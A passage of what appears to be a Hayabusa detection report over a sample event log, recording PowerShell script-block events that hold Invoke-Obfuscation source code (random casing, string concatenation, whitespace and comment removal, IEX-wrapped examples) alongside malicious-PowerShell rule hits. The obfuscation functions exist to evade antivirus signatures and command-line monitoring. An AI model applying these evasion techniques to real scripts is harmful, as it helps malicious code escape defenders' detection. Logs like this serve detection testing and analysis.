Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. # If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. $InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. .EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. # If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. $InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.249 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided 